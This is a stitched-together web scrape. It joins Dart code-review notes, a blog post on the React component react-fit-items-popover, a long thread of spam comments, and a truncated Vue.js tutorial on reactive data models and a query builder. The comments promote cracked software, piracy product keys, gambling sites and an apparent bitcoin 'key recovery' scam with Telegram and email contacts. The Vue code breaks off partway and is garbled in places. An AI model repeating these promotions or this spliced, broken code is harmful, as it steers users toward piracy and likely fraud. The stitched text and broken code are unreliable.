- UndoableCommand has a getter `Command get undoCommand;` which is an inverse of the first. This means that command.undoCommand.undoCommand gets you back to your original command. I used that to implement south and west commands
- I replaced the classes for the direction commands with functions. Mainly cause I didn't think it added much value being a class and cause then I could do `UndoableCommand moveSouthCommand(Robot robot) => moveNorthCommand(robot).undoCommand;`
- removed the reflection cause I didn't see why you need it. I'm pretty sure everything can just be done with closures.
Anyway, just some quick thoughts. Make of them what you will | https://japhr.blogspot.com/2015/12/subclass-just-to-support-one-method.html | CC-MAIN-2018-22 | refinedweb | 743 | 66.33 |
By including this component, you can show overflown items in popover. Lets see how to use this library. This library built on top of react-bootstrap so you should install react-bootstrap to use this
Using npm
npm install react-fit-items-popover --save
Import Component
import FitItemsPopover from 'react-fit-items-popover';
Usage
Here you can pass maximum width, popoverPlacement, popoverClassName, title, items
<FitItemsPopover title="Countries" maxWidth="250px" popoverPlacement="top" popoverClassName="myCustomPopoverClass" items={['Iceland','India','Indonesia','Iran','Iraq','Ireland']}> </FitItemsPopover>
Full example
Here you can find the full example
import React from 'react'; import FitItemsPopover from 'react-fit-items-popover'; import '../../node_modules/bootstrap/dist/css/bootstrap.css' import '../../node_modules/react-fit-items-popover/lib/react-fit-items-popover.css' export default class App extends React.Component { constructor(props) { super(props); } render() { return ( <div> <h1>It Works </h1> <h3>FitItemsPopover example with popover placement</h3> <FitItemsPopover title="Countries" popoverPlacement="right" maxWidth="200px" items={['Iceland','India','Indonesia','Iran','Iraq','Ireland','Israel','Italy']}></FitItemsPopover> </div> ) } }
Relevant information and the programing language gives technical idea.Currently we can get so many online services like best essay writing service. This kind of reputed internet service really give such an amazing offer with relevant price.Students and researcher also madly depends upon such a writing help.
Really Great post! I am actually getting ready to across this information, is very helpful for me my friend. HP Customer Service We are hp service provider and we have a team of the highly trained employee working 24×7 to resolve your problem.
We are needed this article for improving your work place at innovation. So we are all must drive with employees to try new ideas from reviews. Then every user happy to get your great articles and.
light novel
Pada permainan judi seseorang pemain mesti menyiapkan taktik bermain untuk meraih kemenangan tiap-tiap bermain, akan tetapi beberapa pemain judi online belumlah tahu dengan tentu mengenai seperti apa tehnik meraih kemenangan bertambah cepat.
asikqq
dewaqq
sumoqq
interqq
pionpoker
bandar ceme terpercaya
hobiqq
paito warna
forum prediksi
thanks to your website
FaceTime for Android
Helpful InformationCRM Software in Mumbai
There's nothing useful. You should try reading this 10 reason to learn graphic design.
Here, you'll have the option to just recoup a wide range of misfortune from city Day, city Night, Rajdhani Day, Rajdhani Night, KalyanMatka, Matka Indian by Dpboss.team. We've a twisted to confront measure here to shape your existence with loaded up with fun and satisfaction. you'll have the option to have all very Satta Market's live outcomes on things Satta fix jodi..
Thank You For Sharing this kind of stuff. its soo helpful for me.
Easy In Canada.
Your posts are always informative. This post was a very interesting topic for me too. 토토사이트 I wish I could visit the site I run and exchange opinions with each other. So have a nice day.
Nice informative post. Thanks so much for sharing this awesome details .Electrical system design
great article
Home Tutor in rawalpindi
thanks to your website
fraquality constructions
great aticle
Addiction treatment center
Very informative, these kind of write-ups are necessary to acquire health related knowledge and consciousness. Health should be uncompromised on whatever it takes. Best Doctors in Karachi
You are doing really nice work, keep doing and sharing
Hi its very Informative Blog
Thanks for Sharing... I found something on my blog visit for more detail:
crack software
CCleaner Crack
Reimage PC Repair Crack
crack office 2016
Windows 8.1 product key
IDM crack
Movavi video converter crack
Driver Easy Crack.
I wanted this on our website and will now be trying to figure this out and add if possible. Thanks for sharing this information with us.
buy logo online
This write-up says it all. In addition, An individual will not be able to act in accordance with the expected behavior unless experienced. Education should be acquired to tackle all sort of life hacks not just eyeing on certain aspects.
Counseling for University
I am very happy after visiting your website with very useful information. I am from one of the digital marketing agency... To visit my agency click on link Visitdigitalguru
Very nice blog for Personal Emergency Response Systems.
Kindly visit our website by clicking the link below and feel free to give us a message for more information, we are highly recommended and totally safe to work with our English and American tech wizards from world-wide visit us
at https:probitcoinprivatekeyrecovery.com
Or telegram @derrekboyle or probtcpkrecoveryexperts@gmail.com or wickr us at btcrecoverypro
Thanks for sharing informative content…Find noida software company to know more and Contact us on given no.…
colocation and connectivity services at our data centre facilities in Sydney and Tasmania, Contact for Colocation Services Australia
Thanks for sharing information with us…satisfied after visiting your blog…. Learn the latest trends & their practical application by experts with us…you can contact us click on
Visit ISMT India
Really great info you provided here.
Thank You
online assignment help services
Assignment Writing Help
Essay Writing Help
Dissertation Writing Help Services
Case Study Writing Help
This comment has been removed by the author.
Oh. I was very surprised to hear this! Thank for your writting!
snowball io
Even if I can put all my searches on one side and this article on the other, still these words have more worth. Best SEO Services in Pakistan |
Good day! This post could not be written any better! Reading this post reminds me of my previous room mate! He always kept chatting about this. I will forward this page to him. Pretty sure he will have a good read. Thanks for sharing. kèo nhà cái
very nice brather
By purchasing a Windows product key, you will receive a 100% Original Microsoft product key license .
That can be activated directly on the official Microsoft website. Our secure payment methods give you a total guarantee,
and you will receive your software by email after a few minutes of purchase.
I am impressed. You must have been outstanding in perceiving things your way, this article signifies your grip on everyday life. It's like having top shoe brands in Pakistan.online shoes sale in pakistan
I like your post, thanks for sharing it with us,
law dissertation Writers
This is very interesting, You are a very skilled blogger. I've joined your rss feed and look forward to seeking more of your wonderful bong88. Also, I have shared your website in my social networks!
Spot on with this write-up, I truly believe that this amazing site needs much more attention. I’ll probably be returning to read through more, thanks for the information!
Your words really helped here. It was hard for me to go outdoors even for pasta near me. I really wish to have crossed by it earlier.
best pasta near me
I am glad to stop by here, your words here are so understandable that I didn't require to use any language translation services. e-invoicing in saudi arabia
Thanks for such an informative blog, it was really very helpful.
They are able to offer high class web-hosting services and a wide range of search engine optimisations services for the client websites. tradeford com
We recently covered the importance of professional website design as well as how a website design company can help you benefit from a customized website. A professional website design company can assist you in leveraging the power of the Internet in a number of ways. Website Design Company Dubai
Well I truly enjoyed studying it. This article offered by you is very useful for proper planning.
토토
경마
Thanks for your information........
Kitchen wall tiles is a perfect idea to break the visual monotony of the kitchen. In fact, the wall tiles add an upscale feel while cooking. We have an extensive collection of the kitchen wall tiles at MyTyles. One can choose from the wide range of stylish, superior quality and beautifully created tiles. An individual can create any style they want in their kitchen with our different pattern tiles. In fact, you have the choice to pick up from the colorful design tiles to simple stylish plain colors. There is a wide range of the tiles at MyTyles to create the desirable kitchen look. | http://blog.sodhanalibrary.com/2017/03/react-fit-items-popover-show-overflown.html | CC-MAIN-2022-27 | refinedweb | 1,392 | 56.25 |
In my last post, I talked about How To Customize Existing Visual Studio 2005 Templates for Coding Productivity. I essentially modified the existing C# Class.cs template that ships with Visual Studio 2005 to make it more useful in my development environment. This provides me a bit of code generation functionality out-of-the-box, allowing me to spend less time typing mundane code and more time solving problems.
Rather than tinkering with the existing templates that ship with VS 2005, however, Visual Studio 2005 allows you to create custom templates based on existing classes and projects in the IDE. You can create these templates using the Export Template Wizard located on the File Menu.
The VerboseCSharpClass Custom Template
I tend to add a number of regions, XML comments, and various overrides in all my C# Classes. Unfortunately, the default C# Class Template that ships with Visual Studio 2005 is pretty bare, requiring me to create the same class features over and over. And even though I tend to add these same features a lot, I am still not consistent in how I name the regions, write the XML comments, etc.All this typing distracts me from the real work and consumes precious minutes throughout the day.
My custom VerboseCSharpClass Template is to solve my problems. Now when I need a heavy duty class that requires such features, I just choose it from "Add New Item" as opposed to the generic C# Class Template that ships with VS 2005.
Creating The Template
Creating the template is nothing more than creating a C# Class with all the statements, fields, properties, methods, etc. that you want included by default when you create the class. Instead of hardcoding a class name and root namespace, however, you will instead put a couple of parameters used by Visual Studio 2005 to generate them for you within the context of the Add Item Process. Here is my quickly created class for testing purposes:
Exporting the Template
Exporting the template and adding it to Visual Studio 2005 is about as easy as you can get. Once you are happy with the template, save it and choose File > Export Template... on the menu. The export wizard will walk you through a 4-step process that saves the template as a *.Zip file and automatically imports it into Visual Studio 2005 for you. Here is a collage of images showing the process:
Conclusion
Whether you want to modify the existing default templates that ship with Visual Studio 2005, or even better, create new ones by using the Export Template Wizard, it would be a crime not to take advantage of these code generation features to help you be more productive in your day-to-day development efforts. These two features are in addition to the more obvious new way to improve your productivity - Code Snippets.
Recent Posts
Drinking: Japanese Sencha Green Tea
[Advertisement]
PingBack from
Pingback from visual studio 2005 missing web application template | http://codebetter.com/blogs/david.hayden/archive/2005/11/06/134343.aspx | crawl-002 | refinedweb | 495 | 58.42 |
Technical Support
On-Line Manuals
C251 User's Guide
#include <stdlib.h>
void xfree (
void xhuge *p); /* block to free */
The xfree function returns a memory block to the memory
pool. The p argument points to a memory block that
was previously allocated with the xcalloc, xmalloc, or
xrealloc functions. Once it has been returned to the memory
pool by the free function, the block is available for
subsequent allocation.
If p is a null pointer, it is ignored.
Note
None.
xcalloc, xinit_mempool, xmalloc, xrealloc
#include <stdlib.h>
#include <stdio.h> /* for printf */
void tst_free (void) {
void xhuge *mbuf;
printf ("Allocating memory\n");
mbuf = xmalloc (1000);
if (mbuf == NULL) {
printf ("Unable to allocate memory\n");
}
else {
xfree (mbuf);
printf ("Memory free. | http://www.keil.com/support/man/docs/c251/c251_xfree.htm | CC-MAIN-2020-05 | refinedweb | 121 | 65.42 |
Java Patterns For Concurrency
This post talks about some of the patterns we can use to solve concurrency issues relating to state shared across multiple threads. The goal is to provide some smarter alternatives to slapping synchronized on every method call, or around every block of code. The problem with synchronized is that is requires everyone to participate. If you have an object that is mutable and it is shared by synchronizing on it, then nearly every use of that object will require a synchronized block and it only takes one person to forget to create bedlam. In general, the goal is to write code such that we don’t need to consider concurrency, and we can write code without concerning ourselves with how everyone else it handling concurrency.
Limit State Changes To A Single Thread
This is a pattern that has been used in Swing and also JMonkey Engine (JME) where changes to common state should only be made in a main thread. This pattern is useful when you have tasks that go off and run, and once complete they need to catch up and update the display or game objects in the case of JME. I put this one first as it is a very top level pattern. If you decide to go this route, then you don’t have to worry to much about concurrency as long as you always follow the rule of updating state on the main thread.
In any component that runs asynchronously, once completed, it can schedule a piece of code to run on the main thread. Swing and JME offer their own ways of doing this, but you could create your own that allows something like the following:
public void execute() { int value = someLongProcessRunAsynchronously(); MainThread.enqueue(() -> form.updateLabel(value+" records Found")); }
The
Runnable code will be pulled from the queue by the main thread and executed. Obviously, any code run off the queue must be brief and not trigger any long running synchronous actions.
Duplicate State to Make it Local
We can duplicate mutable state into a local variable and reference it locally to take advantage of the fact that locally scoped data is inherently thread safe.
//don't move or update if -ve if (sharedInt >= 0) { moveBy(sharedInt); update(); }
The problem with this code is that if another thread interrupts it mid-execution and sets the
sharedInt value to a negative number, it will have undesired results.
If we copy the value and then work only with our local copy we are guaranteed to have the same value each time it is referenced in our function.
//don't move or update if -ve int localInt = sharedInt; if (localInt >= 0) { moveBy(localInt); update(); }
Here, we have localised the state so it cannot be touched by other threads, but the downside of this is that it can be tricky and/or expensive to copy more complex objects since we must copy the object atomically. For this reason we might need the help of some other patterns to ensure that can happen.
Encapsulate State
Let us say we have a map of key/value pairs, from a functional point of view, we probably might just expose the map to the world and let our threads have at it.
public class MyState { private Map<String,String> parameters; public Map<String,String> getParameters() { return parameters; } } //client code myState.getParameters().put("key","value"); if (myState.getParameters().contains("this")) { //assume 'that' is also present callFunction(myState.getParameters().get("that"); }
This opens a host of problems since any thread can get the map, keep references to it, and update it any time. This is the least thread safe thing we can do as our state has escaped our class.
First off, lets realise that just because we use a map to store some data, we don’t actually need to provide all access to the map to clients. In the interest of making it thread safe, we can encapsulate the map and just provide methods to access that map. Our state has no longer leaked out of the class and is somewhat protected. Once encapsulated, we can control how we access the map and do so in a manner that is more thread-safe.
For a first draft, we can simply make access methods synchronized :
public class MyState { private Map<String,String> parameters; public synchronized void addParameter(String key, String value) { parameters.put(key,value); } public synchronized String getParameter(String key) { return parameters.get(key); } }
We’ve made our code a little safer and arguably, a little better according to the Law of Demeter.
One problem is we have put synchronized on the methods and if we have other synchronized methods in the same class, even for different reasons, they will end up blocking each other unnecessarily. One solution is just to synchronize on the parameters object when we use it which should improve things a little, but there are some alternatives we can use to make things even better:
Read/Write Locks
If we read from an object far more than we write, we could improve the above example further. We can use Read/Write locks to ensure that we only block read access to the object when we are writing, but otherwise we can concurrently read from the object without being blocked by other readers. Infrequently writing means that readers should not be blocked that often.
public class MyState { private Map<String,String> parameters; private ReentrantReadWriteLock lock = new ReentrantReadWriteLock(); public void addParameter(String key, String value) { lock.writeLock().lock(); try { parameters.put(key,value); } finally { lock.writeLock().unlock(); } } public String getParameter(String key) { lock.readLock().lock(); try { return parameters.get(key); } finally { lock.readLock().unlock(); } } }
This does take more code including the try/finally blocks but it allows nearly unlimited concurrent reading with only writes blocking. We also have some options for dealing with cloning state atomically which was an issue raised above. (As an aside, why do we not have a method for passing the lockable code as a lambda such as
lock.readLock().execute(()->parameters.get(key));?).
We also have some nice options with locks that don’t make much sense here, but we can have timeouts for locks etc and as far as the interface goes, we can implement whatever helper functions we want and use the locks to handle them easily, such as the getter and add functions.
As an example, we can easily make a copy of the map without worrying about a write action disrupting things mid-execution:
public Map<String,String> getParameters() { lock.readLock().lock(); try { return new HashMap<>(parameters); } finally { lock.readLock().unlock(); } }
This means we can handle making a local copy of the state atomically and use it in conjunction with the local duplicate state pattern. This provides an implementation that is thread safe without the client even having to consider thread safety, nor can it be used in a thread unsafe manner.
Summary
These are some of the patterns you can use to defuse any concurrency issues with mutable state without having to resort to putting synchonized on everything and hoping for the best. | https://www.andygibson.net/blog/programming/java-patterns-for-concurrency/ | CC-MAIN-2021-31 | refinedweb | 1,187 | 57.3 |
The core implementation of dat
npm install dat-core
var dat = require('dat-core')

var db = dat('./my-dat', {createIfMissing: true})

db.put('hello', 'world', function (err) {
  db.get('hello', function (err, result) {
    console.log(result.value)
    console.log(db.head) // the head revision of the dat
  })
})
db = dat(pathOrLevelDb, [options])
Create a new dat instance.
valueEncoding- 'json' | 'binary' | 'utf-8' or a custom encoder instance
createIfMissing- true or false, default false. creates dat folder if it doesnt exist
backend- a leveldown compatible constructor to use (default is require('leveldown'))
blobs- an abstract-blob-store compatible instance to use (default is content-addressable-blob-store)
By default the path passed to the backend is {path}/.dat/db.
If your custom backend requires a special URL, simply wrap it in a function:
var sqldown = require('sqldown')

var db = dat('./my-dat', {
  backend: function (path) {
    return sqldown('postgres://localhost/mydb') // illustrative connection string
  }
})
db.head
String property containing the current head revision of the dat. Everytime you mutate the dat this head changes.
db.init([cb])
Inits the dat by adding a root node to the graph if one hasn't been added already. Is called implicitly when you do a mutating operation.
cb (if specified) will be called with one argument, (error)
db.put(key, value, [opts], [cb])
Insert a value into the dat
cb (if specified) will be called with one argument, (error)
dataset- the dataset to use
valueEncoding- an encoder instance to use to encode the value
db.get(key, [options], cb)
Get a value node from the dat
cb will be called with two arguments,
(error, value). If successful,
value will have these keys:
{content: // 'file' or 'row'type: // 'put' or 'del'version: // version hashchange: // internal change numberkey: // row keyvalue: // row value}
dataset- the dataset to use
valueEncoding- an encoder instance to use to decode the value
db.del(key, [cb])
Delete a node from the dat by key
cb (if specified) will be called with one argument,
(error)
db.listDatasets(cb)
Returns a list of the datasets currently in use in this checkout
cb will be called with two arguments,
(error, datasets) where
datasets is an array of strings (dataset names)
set = dat.dataset(name)
Returns a namespaced dataset (similar to a sublevel in leveldb).
If you just use
dat.put and
dat.get it will use the default dataset (equaivalent of doing
dat.dataset().
stream = db.createReadStream([options])
Stream out values of the dat. Returns a readable stream.
stream = db.createWriteStream([options])
Stream in values to the dat. Returns a writable stream.
dataset- the dataset to store the data in
message- a human readable message string to store with the metadata for the changes made by the write stream
transaction- boolean, default false. if true everything written to the write stream will be stored as 1 transaction in the history
batchSize- default
128, the group size used to write to the underlying leveldown batch write. this also determines how many nodes end up in the graph (higher batch size = less nodes)
valueEncoding- override the value encoding set on the dat-core instance
When you write data to the write stream, it must look like this:
{type: // 'put' or 'del'key: // keyvalue: // value}
stream = db.createFileReadStream(key, [options])
Read a file stored under the key specified. Returns a binary read stream.
stream = db.createFileWriteStream(key, [options])
Write a file to be stored under the key specified. Returns a binary write stream.
stream = db.createPushStream([options])
Create a replication stream that both pushes changes to another dat
stream = db.createPullStream([options])
Create a replication stream that both pulls changes from another dat
stream = db.createReplicationStream([options])
Create a replication stream that both pulls and pushes
stream = db.createChangesStream([options])
Get a stream of changes happening to the dat. These changes are ONLY guaranteed to be ordered locally.
stream = db.heads()
Get a stream of heads in the underlying dat graph.
stream = db.layers()
Get a stream of layers in the dat.
A layer will added if both you and a remote make changes to the dat and you then pull the remote's changes.
They can also happen if you checkout a prevision revision and make changes.
stream = db.diff(branch1, branch2)
Compare two or more branches with each other. The stream will emit key,value pairs that conflict across the branches
stream = db.merge(branch1, branch2)
Returns a merge stream. You should write key,value pairs to this stream that conflicts across the branches (see the compare method above).
Once you end this stream the branches will be merged assuming the don't contain conflicting keys anymore.
anotherDat = db.checkout(ref)
Checkout an older revision of the dat. This is useful if you want to pin your data to a point in time.
db
If you want to make this checkout persistent, i.e. your default head, set the
{persistent: true} option
var anotherDat = dbanotherDat
To reset your persistent head to the previous use
db.checkout(false, {persistent: true})
Wherever you can specify
valueEncoding, in addition to the built in string types you can also pass in an object with
encode and
decode methods.
For example, here is the implementation of the built-in JSON encoder:
var json ={return JSON}{return JSON}
MIT | https://www.npmjs.com/package/dat-core | CC-MAIN-2017-47 | refinedweb | 826 | 64.2 |
This is your resource to discuss support topics with your peers, and learn from each other.
02-03-2011 06:14 PM
HI all,
I was hoping you guys could help me with this, I've done a search and nobody seems to be experiencing the same problem. So first the setup: I have a TileList set up with one row in it. This TileList is using a custom class that extends CellRenderer to display its data. The problem is that if I scroll so the first element isn't visible anymore, its value is replaced by another element in my dataProvider.
Here's my code for the CellRenderer (where I'm assuming the problem lies):
public class MyRenderer extends CellRenderer { private var renderer:MyDataDisplay = new MyDataDisplay(); public function MyRenderer() { super(); } override protected function onAdded():void{ super.onAdded(); addChild(renderer); } override protected function onRemoved():void{ super.onRemoved(); removeChild(renderer); } override protected function drawLabel():void{ super.drawLabel(); if(data){ renderer.title.text= data.name as String; renderer.date.text = data.date as String; } }
Solved! Go to Solution.
02-03-2011 06:39 PM
hey cyangreen,
cell renderers and lists are the achilie heels of the QNX API's when it comes to figuring them out haha. and once you think u got it down, something unexpected happens and you have to change it up again lol.
i've run into problems here and there and usually when setting the data and what not, i override the public data() setter. that way i get accurate results. the cell renderer and list do some funky things sometiems and get weird read outs. so try doing that and see if that changes anything. so instead of overriding the drawLabel() method, override the data() setter:
override public function set data(data:Object):void { super.data = data; if (data.name && data.data) { renderer.title.text= data.name as String; renderer.date.text = data.date as String; } }
lemme know how that turns out. if it doesnt work, we'll try something else. good luck!
02-03-2011 07:00 PM
Thanks so much JRab, that did it.
For anyone experiencing similar issues, you have to remember to override onAdded and onRemoved:
override protected function onAdded():void{ super.onAdded(); addChild(el); //for all visual elements you want to add to this renderer } override protected function onRemoved():void{ super.onRemoved(); removeChild(element); //do this for all visual elements you've added }
If you don't do this, your data will start overlapping itself and start acting really wonky.
Thanks again JRab
02-03-2011 07:05 PM
not a problem at all. just glad you got it figured out and thanks for the tip!
p.s i like your choice of wording: "wonky" | https://supportforums.blackberry.com/t5/Adobe-AIR-Development/TileList-not-preserving-order-of-data-with-custom-CellRenderer/m-p/773563 | CC-MAIN-2017-04 | refinedweb | 454 | 57.98 |
Get a free year on Tuts+ this month when you purchase a Siteground hosting plan from $3.95/mo
Ruby is a one of the most popular languages used on the web. We've started a new screencast series here on Nettuts+ that will introduce you to Ruby, as well as the great frameworks and tools that go along with Ruby development. In this lesson, we’ll be taking a deeper look at operators in Ruby, and why they are different from anything you’ve ever seen before.
Operators
You’ve familiar with operators.
1 + 2 # 3 person[:name] = "Joe"
Operators are things like the plus sign (one of the arithmetic operators), or the equal sign (the assignment operator). These things don’t look to much different from the ones you use in JavaScript, PHP, or any other language. But—like most of Ruby—there’s a lot more than meets the eye going on here.
Here’s the secret: operators in Ruby are really method calls. Try this:
1.+(2) # 3
Here, we’re calling the
+ operator on the object
1, passing in the object
2 as a parameter. We get back the object
3. We can do this with strings too:
name = "Joe" name.+(" Smith") # "Joe Smith", but `name` is still "Joe" name += " Smith" # name is now "Joe Smith"
As you can see, we can do string concatenation with the
+ method. As a bonus here, ruby defines the += operator based on the + operator (note: you can’t use += as a method).
As you might realize, this gives us incredible power. We can customize the meaning of adding, subtracting, and assigning objects in our custom classes. We saw how this works with properties on objects in our lesson on classes (we defined a
property and
property= method in the class, and got the expected syntax sugar for using them). What we’re looking at here is taking that a step further.
Building our own Operator Methods
Let’s try to create one of these methods ourselves. For this example, let’s create a refrigerator object, that we can add things to via the
+ operator and take things out of via the
- operator.
Here’s the start of our class:
class Fridge def initialize (beverages=[], foods=[]) @beverages = beverages @foods = foods end def + (item) end def - (item) end end
Our
initialize function is pretty simple: we take two parameters (that fall back to empty arrays if nothing is given), and assign them to instance variables. Now, let’s build those two functions:
def + (item) if item.is_a? Beverage @beverages.push item else @foods.push item end end
This is pretty simple. Every object has an
is_a? method that takes a single parameter: a class. If the object is an instance of that class, it will return true; otherwise, it will return false. So, this says that if the item we’re adding to the fridge is a
Beverage, we’ll add it to the
@beverages array. Otherwise, we’ll add it to the
@food array.
That’s good; now, how about taking things out of the fridge? (Note: this method is different from the one shown in the video; this shows you that these operator method give us a great deal of flexibility; they are really just normal methods that you can do anything with. Also, I think this is a better version of the method; however, it’s more complex.)
def - (item) ret = @beverages.find do |beverage| beverage.name.downcase == item.downcase end return @beverages.delete ret unless ret.nil? ret = @foods.find do |food| food.name.downcase == item.downcase end @foods.delete ret end
Here’s what’s going on when we use the minus operator. The parameter that it takes is a string, with the name of the item we’re looking for (By the way, we’ll create the
Beverage and
Food classes soon). We start by using the
find method that arrays have. There are a few ways to use this method; we’re passing it a block; this block says that we’re trying to find the item in the array which has a
name property that’s the same as the string we passed in; note that we’re converting both strings to lowercase, to be safe.
If there’s an item that matches in the array, that will be stored in
ret; otherwise,
ret will be
nil. Next, we’ll return the result of
@beverage.delete ret, which removes the item from the array and returns it. Notice we’re using a statement modifier at the end of that line: we do this unless
ret is
nil.
You might wonder why we’re using the keyword
return here, since it’s not required in Ruby. If we didn’t use it here, the function wouldn’t return yet, since there’s more code to the function. Using
return here allows us to return a value from a place the function wouldn’t normally return.
If we don’t return, that means the item wasn’t found in
@beverages. Therefore, we’ll assume it’s in
@foods. We’ll do the same thing to find the item in
@foods and then return it.
Before testing this out, we’ll need our
Food and
Beverages classes:
class Beverage attr_accessor :name def initialize name @name = name @time = Time.now end end class Food attr_accessor :name def initialize name @name = name @time = Time.now end end
Note that in the video, I didn’t make
@name accessible from outside the object. Here, I’m doing that with
attr_accessor :name, so that we can check the name of these object when they’re inside a fridge.
So, let’s test it out in irb; we’ll start by requiring the file that holds the code; then, give the classes a try; note that I’ve added line breaks to the output for easier reading.
> require './lesson_6' => true > f = Fridge.new => #<Fridge:0x00000100a10378 @beverages=[], @foods=[]> > f + Beverage.new("water") => [#<Beverage:0x000001009fe8d0 @name="water", @time=2011-01-15 13:20:48 -0500>] > f + Food.new("bread") => [#<Food:0x000001009d3c98 @name="bread", @time=2011-01-15 13:20:59 -0500>] > f + Food.new("eggs") => [ #<Food:0x000001009d3c98 @name="bread", @time=2011-01-15 13:20:59 -0500>, #<Food:0x000001009746a8 @name="eggs", @time=2011-01-15 13:21:04 -0500> ] > f + Beverage.new("orange juice") => [ #<Beverage:0x000001009fe8d0 @name="water", @time=2011-01-15 13:20:48 -0500>, #<Beverage:0x00000100907cd8 @name="orange juice", @time=2011-01-15 13:21:16 01009d3c98 @name="bread", @time=2011-01-15 13:20:59 -0500>, #<Food:0x000001009746a8 @name="eggs", @time=2011-01-15 13:21:04 -0500> ] > f - "bread" => #<Food:0x000001009d3c98 @name="bread", @time=2011-01-15 13:20:59 01009746a8 @name="eggs", @time=2011-01-15 13:21:04 -0500>]
As we go along, you can see things being added to the
@beverages and
@foods arrays, and then subsequently removed.
Get and Set Operators
Now let’s write methods for the get and set operators used with hashes. You’ve seen this before:
person = {} person[:name] = "Joe"
But, since these operators are methods, we can do it this way:
person.[]=(:age, 35) # to set person.[](:name) # to get
That’s right; these are normal methods, with special sugar for your use.
Let’s give this a try; we’ll make a
Club class. Our club with have members with different roles. However, we may want to have more than one member with a given role. So, our
Club instance will keep track of members and their roles with a hash. If we try to assign a second member to a role, instead of overwriting the first one, we’ll add it.
class Club def initialize @members = {} end def [] (role) @members[role] end def []= (role, member) end end
The get version is pretty simple; we just forward it to the
@members array. But set is a little more complicated:
def []== (role, member) if @members[role].nil? @members[role] = member elsif @members[role].is_a? String @members[role] = [ @members[role], member ] else @members[role].push member end end
If that role has not been set, we’ll just set the value of that key to our member hash. If it has been set as a string, we want to convert that to an array, and put the original member and the new member in that array. Finally, if neither of those options are true, it’s already an array, and so we just push the member into the array. We can test this class this way:
c = Club.new c[:chair] = "Joe" c[:engineer] = "John" c[:engineer] = "Sue" c[:chair] # "Joe" c[:engingeer] # [ "John", "Sue" ]
There you go!
Other Operators
These aren’t the only operators that we can do this with, of course. Here’s the whole list:
- Arithmetic Operators:
+ - * \
- Get and Set Operators:
[] []=
- Shovel Operator:
<<
- Comparison Operators:
== < > <= >=
- Case equality Operator:
===
- Bit-wise Operator:
| & ^
Thanks for Reading!
If you’ve got any questions about this lesson, or anything else we’ve discussed in Ruby, ask away in the comments!
Tuts+ tutorials are translated into other languages by our community members—you can be involved too!Translate this post
| http://code.tutsplus.com/tutorials/ruby-for-newbies-operators-and-their-methods--net-18163 | CC-MAIN-2015-22 | refinedweb | 1,528 | 72.66 |
I absolutely love the concept of reactive computed properties in Vue.js. So much so that I miss them in situations where I don’t have them available. In this article, we will explore how to create reactive data models with all the features of regular Vue.js components such as computed properties. Our goal is to fetch data from an API and store it in a reactive data model.
Reactive data models
Most of the time we tend to fetch data directly in our components and use computed properties in case we need to process the received data.
// BlogPost.vue // ... export default { name: 'BlogPost', // ... computed: { authorFullName() { return `${this.post.author.firstName} ${this.post.author.lastName}`; }, intro() { if (!this.post) return null; const wordCount = 20; return `${this.post.body .split(' ') .slice(0, wordCount) .join(' ')}...`; } }, async created() { this.post = await fetch('/posts/1'); }, // ... };
But now let’s assume we have two or more components in which we want to render the full name of the author of a blog post and a short version of the blog post itself. This means that we have to repeat the same computed properties over and over again.
Wouldn’t it be nice to actually have the computed properties directly in a data model? Ideally, we would have to write the logic only once in the data model and the consuming components would access it like any other regular property - ideally, the data model should work like a Vue.js component.
One possible way to achieve the desired effect is to use Vuex. And there’s no reason why you shouldn’t use Vuex in such a case, actually I’d say it’s perfect for solving such problems. But sometimes it seems a bit over the top to use a global state management solution just to solve a tiny problem.
Creating a Vue.js powered data model
A lesser-known feature of Vue.js is the ability to create a new instance of
Vue without the intention of rendering anything.
import Vue from 'vue'; const author = new Vue({ data() { return { firstName: 'Joana', lastName: 'Doe', }; }, computed: { fullName() { return `${this.firstName} ${this.lastName}`; }, }, }); console.log(author.fullName); // Joana Doe author.firstName = 'John'; console.log(author.fullName); // John Doe
Actually, the above code already looks exactly how I imagine a reactive data model should work - and that’s not surprising, because that’s exactly what Vue.js is all about. Now let’s combine this with a simplified prototype of a Query Builder.
Creating a JavaScript Query Builder
When I first thought of this pattern, I had Laravel Eloquent models in mind. A very powerful feature of the Laravel Eloquent models is that each model serves as a Query Builder. For this article I want to implement a very simple version of a Query Builder, which can be improved as needed.
// src/utils/model.js import Vue from 'vue'; // Helper for creating a new Vue.js // powered data model instance. const vueify = ({ data, model }) => { const instance = new Vue(model); Object.keys(data).forEach(key => { // The hash `#` prefix means that // this properties should not be // modified directly. if (typeof instance[`#${key}`] === 'undefined') return; instance[`#${key}`] = data[key]; }); return instance; }; function QueryBuilder({ model, provider }) { this.query = []; this.model = model; this.provider = provider; } QueryBuilder.prototype.where = function(queryParams) { this.query.push(queryParams); return this; }; QueryBuilder.prototype.first = async function() { const data = await this.provider.find(this.query); return vueify({ data, model: this.model }); }; QueryBuilder.prototype.all = async function() { const response = await this.provider.list(); return response.map(data => vueify({ data, model: this.model })); }; QueryBuilder.prototype.get = async function() { const response = await this.provider.list(this.query); return response.map(data => vueify({ data, model: this.model })); }; // ...
Above you can see a very simple implementation of a Query Builder. In a real world application, you would most likely add more features like logical operators, but for demo purposes that’s good enough.
// src/utils/model.js // ... export const makeModel = ({ computed, fields, provider }) => { const model = { data: () => // Create prefilled data properties // for each field of the model. Object.keys(fields).reduce( (prev, key) => ({ ...prev, [`#${key}`]: fields[key].default, }), {}, ), // The values of the fields of the model // should not be changed directly, so we // expose them as immutable computed // properties. computed: { ...Object.keys(fields).reduce( (prev, key) => ({ ...prev, [key]() { return this[`#${key}`]; }, }), {}, ), ...computed } }; return new QueryBuilder({ model, provider }); };
The
makeModel() function above, takes an object of computed properties, the fields of the model and a provider for the Query Builder and returns a new Query Builder object.
import { makeModel } from '../utils/model'; import fakeProvider from './providers/fake'; export const makePost = ({ ellipsis = '...', words = 10 }) => makeModel({ fields: { author: { default: {} }, body: { default: null }, title: { default: null }, }, computed: { authorFullName() { if (!this.author.firstName) return null; return `${this.author.firstName} ${this.author.lastName}`; }, intro() { if (!this.body) return null; return `${this.body .split(' ') .slice(0, words) .join(' ')}${ellipsis}`; } }, provider: fakeProvider });
Here you can see how we can utilize
makeModel() in our new
makePost() function.
makePost() takes some configuration options and returns a new
post model which we can use to query our (fake) API exposed via the
fakeProvider. In a production application you would have an
apiProvider or a
vuexProvider or maybe even a
localStorageProvider which are abstraction layers to fetch data from an API, a Vuex store or the local storage of your browser.
Do you want to learn more about advanced Vue.js techniques?
Register for the Newsletter of my upcoming book: Advanced Vue.js Application Architecture.
Put it together
Next you can see how we can use the
post model returned by
makePost() in a regular Vue.js component.
